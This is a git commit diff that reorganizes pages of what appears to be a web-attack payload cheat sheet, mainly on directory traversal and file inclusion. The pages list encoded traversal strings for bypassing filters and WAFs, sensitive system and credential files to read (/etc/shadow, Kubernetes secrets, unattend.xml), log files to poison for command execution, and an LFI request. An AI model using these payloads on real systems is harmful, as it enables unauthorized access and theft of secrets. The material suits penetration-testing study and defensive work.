Directory traversal / File inclusion rewritten
parent
e480c9358d
commit
67c644a300
|
@ -0,0 +1,129 @@
|
|||
# Directory traversal
|
||||
|
||||
> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Basic exploitation](#basic-exploitation)
|
||||
* [Path Traversal](#path-traversal)
|
||||
|
||||
## Basic exploitation
|
||||
|
||||
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
|
||||
|
||||
```powershell
|
||||
../
|
||||
..\
|
||||
..\/
|
||||
%2e%2e%2f
|
||||
%252e%252e%252f
|
||||
%c0%ae%c0%ae%c0%af
|
||||
%uff0e%uff0e%u2215
|
||||
%uff0e%uff0e%u2216
|
||||
```
|
||||
|
||||
16 bit Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %u002e
|
||||
/ = %u2215
|
||||
\ = %u2216
|
||||
```
|
||||
|
||||
UTF-8 Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %c0%2e, %e0%40%ae, %c0ae
|
||||
/ = %c0%af, %e0%80%af, %c0%2f
|
||||
\ = %c0%5c, %c0%80%5c
|
||||
```
|
||||
|
||||
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
|
||||
|
||||
```powershell
|
||||
..././
|
||||
...\.\
|
||||
```
|
||||
|
||||
Double URL encoding
|
||||
|
||||
```powershell
|
||||
. = %252e
|
||||
/ = %252f
|
||||
\ = %255c
|
||||
```
|
||||
|
||||
|
||||
## Path Traversal
|
||||
|
||||
Linux - Interesting files to check out :
|
||||
|
||||
```powershell
|
||||
/etc/issue
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/etc/group
|
||||
/etc/hosts
|
||||
/etc/motd
|
||||
/etc/mysql/my.cnf
|
||||
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
|
||||
/proc/self/environ
|
||||
/proc/version
|
||||
/proc/cmdline
|
||||
/proc/sched_debug
|
||||
/proc/mounts
|
||||
/proc/net/arp
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/net/udp
|
||||
```
|
||||
|
||||
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||
|
||||
```powershell
|
||||
c:/boot.ini
|
||||
c:/inetpub/logs/logfiles
|
||||
c:/inetpub/wwwroot/global.asa
|
||||
c:/inetpub/wwwroot/index.asp
|
||||
c:/inetpub/wwwroot/web.config
|
||||
c:/sysprep.inf
|
||||
c:/sysprep.xml
|
||||
c:/sysprep/sysprep.inf
|
||||
c:/sysprep/sysprep.xml
|
||||
c:/system32/inetsrv/metabase.xml
|
||||
c:/sysprep.inf
|
||||
c:/sysprep.xml
|
||||
c:/sysprep/sysprep.inf
|
||||
c:/sysprep/sysprep.xml
|
||||
c:/system volume information/wpsettings.dat
|
||||
c:/system32/inetsrv/metabase.xml
|
||||
c:/unattend.txt
|
||||
c:/unattend.xml
|
||||
c:/unattended.txt
|
||||
c:/unattended.xml
|
||||
```
|
||||
|
||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||
|
||||
```powershell
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/error.log
|
||||
/var/log/httpd/error_log
|
||||
/usr/local/apache/log/error_log
|
||||
/usr/local/apache2/log/error_log
|
||||
/var/log/vsftpd.log
|
||||
/var/log/sshd.log
|
||||
/var/log/mail
|
||||
```
|
||||
|
||||
Other easy win files.
|
||||
|
||||
```powershell
|
||||
/home/$USER/.bash_history
|
||||
/var/run/secrets/kubernetes.io/serviceaccount
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
0
File Inclusion - Path Traversal/Intruders/Traversal.txt → File inclusion/Intruders/Traversal.txt
Executable file → Normal file
0
File Inclusion - Path Traversal/Intruders/Traversal.txt → File inclusion/Intruders/Traversal.txt
Executable file → Normal file
|
@ -1,4 +1,4 @@
|
|||
# File Inclusion - Path Traversal
|
||||
# File Inclusion
|
||||
|
||||
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
|
||||
|
||||
|
@ -6,7 +6,6 @@ The Path Traversal vulnerability allows an attacker to access a file, usually ex
|
|||
|
||||
## Summary
|
||||
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Basic LFI](#basic-lfi)
|
||||
* [Basic RFI](#basic-rfi)
|
||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||
|
@ -24,78 +23,10 @@ The Path Traversal vulnerability allows an attacker to access a file, usually ex
|
|||
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
|
||||
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
|
||||
|
||||
|
||||
## Path Traversal
|
||||
|
||||
Linux - Interesting files to check out :
|
||||
|
||||
```powershell
|
||||
/etc/issue
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/etc/group
|
||||
/etc/hosts
|
||||
/etc/motd
|
||||
/etc/mysql/my.cnf
|
||||
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
|
||||
/proc/self/environ
|
||||
/proc/version
|
||||
/proc/cmdline
|
||||
/proc/sched_debug
|
||||
/proc/mounts
|
||||
/proc/net/arp
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/net/udp
|
||||
```
|
||||
|
||||
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||
|
||||
```powershell
|
||||
c:/boot.ini
|
||||
c:/inetpub/logs/logfiles
|
||||
c:/inetpub/wwwroot/global.asa
|
||||
c:/inetpub/wwwroot/index.asp
|
||||
c:/inetpub/wwwroot/web.config
|
||||
c:/sysprep.inf
|
||||
c:/sysprep.xml
|
||||
c:/sysprep/sysprep.inf
|
||||
c:/sysprep/sysprep.xml
|
||||
c:/system32/inetsrv/metabase.xml
|
||||
c:/sysprep.inf
|
||||
c:/sysprep.xml
|
||||
c:/sysprep/sysprep.inf
|
||||
c:/sysprep/sysprep.xml
|
||||
c:/system volume information/wpsettings.dat
|
||||
c:/system32/inetsrv/metabase.xml
|
||||
c:/unattend.txt
|
||||
c:/unattend.xml
|
||||
c:/unattended.txt
|
||||
c:/unattended.xml
|
||||
```
|
||||
|
||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||
|
||||
```powershell
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/error.log
|
||||
/var/log/httpd/error_log
|
||||
/usr/local/apache/log/error_log
|
||||
/usr/local/apache2/log/error_log
|
||||
/var/log/vsftpd.log
|
||||
/var/log/sshd.log
|
||||
/var/log/mail
|
||||
```
|
||||
|
||||
Other easy win files.
|
||||
|
||||
```powershell
|
||||
/home/$USER/.bash_history
|
||||
/var/run/secrets/kubernetes.io/serviceaccount
|
||||
```
|
||||
|
||||
## Basic LFI
|
||||
|
||||
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../etc/passwd
|
||||
```
|
0
File Inclusion - Path Traversal/phpinfolfi.py → File inclusion/phpinfolfi.py
Executable file → Normal file
0
File Inclusion - Path Traversal/phpinfolfi.py → File inclusion/phpinfolfi.py
Executable file → Normal file
|
@ -2,6 +2,8 @@
|
|||
|
||||
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
|
||||
|
||||
## Summary
|
||||
|
||||
- JWT Format
|
||||
- JWT Signature - None algorithm
|
||||
- JWT Signature - RS256 to HS256
|
||||
|
|
|
@ -1,6 +1,12 @@
|
|||
# SQL injection
|
||||
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
|
||||
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
|
||||
|
||||
Attempting to manipulate SQL queries may have goals including:
|
||||
- Information Leakage
|
||||
- Disclosure of stored data
|
||||
- Manipulation of stored data
|
||||
- Bypassing authorisation controls
|
||||
|
||||
## Summary
|
||||
|
||||
|
|
|
@ -1,48 +0,0 @@
|
|||
# Traversal Directory
|
||||
|
||||
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic
|
||||
|
||||
```powershell
|
||||
../
|
||||
..\
|
||||
..\/
|
||||
%2e%2e%2f
|
||||
%252e%252e%252f
|
||||
%c0%ae%c0%ae%c0%af
|
||||
%uff0e%uff0e%u2215
|
||||
%uff0e%uff0e%u2216
|
||||
..././
|
||||
...\.\
|
||||
```
|
||||
|
||||
16 bit Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %u002e
|
||||
/ = %u2215
|
||||
\ = %u2216
|
||||
```
|
||||
|
||||
Double URL encoding
|
||||
|
||||
```powershell
|
||||
. = %252e
|
||||
/ = %252f
|
||||
\ = %255c
|
||||
```
|
||||
|
||||
UTF-8 Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %c0%2e, %e0%40%ae, %c0ae
|
||||
/ = %c0%af, %e0%80%af, %c0%2f
|
||||
\ = %c0%5c, %c0%80%5c
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
Loading…
Reference in New Issue